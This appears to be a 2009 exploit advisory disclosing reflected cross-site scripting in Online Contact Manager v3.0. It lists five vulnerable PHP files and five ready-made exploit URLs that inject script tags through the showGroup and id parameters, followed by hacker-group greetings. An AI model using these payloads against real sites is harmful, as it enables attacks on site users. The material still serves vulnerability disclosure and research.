========================================================================================= Title : Multiple Cross-site Scripting (XSS) Vulnerability Software : Online Contact Manager v3.0 Vendor : www.esoftpro.com Date : 19 April 2009 Author : Vrs-hCk Contact : d00r@telkom.net Blog : c0li.BlogSpot.Com ========================================================================================= [-] Vulnerable index.php view.php email.php edit.php delete.php [-] Exploit http://[site]/[path]/index.php?showGroup=+<script>alert(123)</script> http://[site]/[path]/view.php?id=+<script>alert(123)</script> http://[site]/[path]/email.php?id=+<script>alert(123)</script> http://[site]/[path]/edit.php?id=+<script>alert(123)</script> http://[site]/[path]/delete.php?id=+<script>alert(123)</script> ========================================================================================= [-] Greetz : Paman, NoGe, OoN_Boy, Angela Chang, pizzyroot, zxvf, ajegille, em|nem, loqsa, Fluzy, bl4Ck_3n91n3, H312Y, S3T4N, Janroe, and special muaacchh utk Dia yg Ku Cintai (*_^) c0li.m0de.0n and Behave oR BeGone !!! =========================================================================================